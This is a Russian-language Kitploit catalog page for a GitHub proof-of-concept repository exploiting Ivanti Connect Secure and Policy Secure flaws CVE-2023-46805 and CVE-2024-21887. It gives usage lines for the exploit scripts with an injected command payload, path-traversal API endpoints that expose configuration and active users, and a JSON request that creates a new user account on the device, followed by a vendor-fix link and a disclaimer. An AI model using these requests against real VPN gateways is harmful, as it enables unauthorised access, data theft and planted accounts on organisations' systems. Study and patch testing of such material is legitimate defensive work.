Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-46805_CVE-2024-21887 — Уязвимость обхода аутентификации в веб-компоненте Ivanti ICS 9.x, 22.x и Ivanti Policy Secure позволяет удалённому злоумышленнику получить доступ к ограниченным ресурсам, обходя проверки контроля доступа. | Kitploit
Инструменты/GitHubGitHub/duy-31/cve-2023-46805_cve-2024-21887
Аутентификация и авторизацияАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и Управление
GitHubduy-31/cve-2023-46805_cve-2024-21887

CVE-2023-46805_CVE-2024-21887

Уязвимость обхода аутентификации в веб-компоненте Ivanti ICS 9.x, 22.x и Ivanti Policy Secure позволяет удалённому злоумышленнику получить доступ к ограниченным ресурсам, обходя проверки контроля доступа.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
2342 лет назадПроверено Kitploit

CVE-2023-46805

Уязвимость обхода аутентификации в веб-компоненте Ivanti ICS 9.x, 22.x и Ivanti Policy Secure позволяет удалённому злоумышленнику получить доступ к ограниченным ресурсам, обходя проверки контроля доступа.

использование: ./CVE-2023-46805.sh http(s)://fqdn:port
./CVE-2023-46805.sh https://my.vpn.ip:443

image

примечания: chmod +x CVE-2023-46805.sh
требуются приложения curl + json_pp

результат: если система уязвима, вы должны увидеть некоторые данные:

image

CVE-2024-21887

Уязвимость внедрения команд в веб-компонентах Ivanti Connect Secure (9.x, 22.x) и Ivanti Policy Secure позволяет аутентифицированному администратору отправлять специально созданные запросы и выполнять произвольные команды на устройстве.

  • запустите PoC (он проверит 2 точки входа)

использование: ./CVE-2024-21887.sh http(s)://fqdn:port payload_cmd
./CVE-2024-21887.sh https://my.vpn.ip:443 "touch /tmp/pwned"

результат: если система уязвима, вы должны увидеть некоторые данные, и ваша полезная нагрузка должна сработать: image

примечания: chmod +x CVE-2024-21887.sh
требуются приложения curl, xxd, tr и sed

Ценная информация

/api/v1/totp/user-backup-code/../../configuration/system/configuration /api/v1/totp/user-backup-code/../../system/active-users

/api/v1/totp/user-backup-code/../../configuration/administrators/admin-realms/realm/Admin%20Users

  • создать учётную запись /authentication/auth-servers/authserver/System%20Local/local/users/user

-H 'Content-Type:application/json' -d '{"change-password-at-signin": "false", "consoleaccess": "false", "enabled": "true", "fullname": "new user", "one-timeuse": "false", "password-cleartext": "new_password", "username": "login_user"}'



Обходной путь/Исправление: https://forums.ivanti.com/s/article/CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?language=en_US

Благодарности: https://attackerkb.com/topics/AdUh6by52K/cve-2023-46805/rapid7-analysis


больше обо мне ;) https://www.linkedin.com/in/duy-huan-bui/

⚠️ Отказ от ответственности: ВАЖНО: Этот скрипт предоставлен ТОЛЬКО для образовательных целей, этического тестирования и законного использования. Не используйте его в любой системе или сети без явного разрешения. Несанкционированный доступ к компьютерным системам и сетям незаконен, и пользователи, уличенные в несанкционированной деятельности, подлежат привлечению к ответственности. Автор НЕ несёт ответственности за любой ущерб, причинённый неправомерным использованием этого скрипта.

Скачать инструмент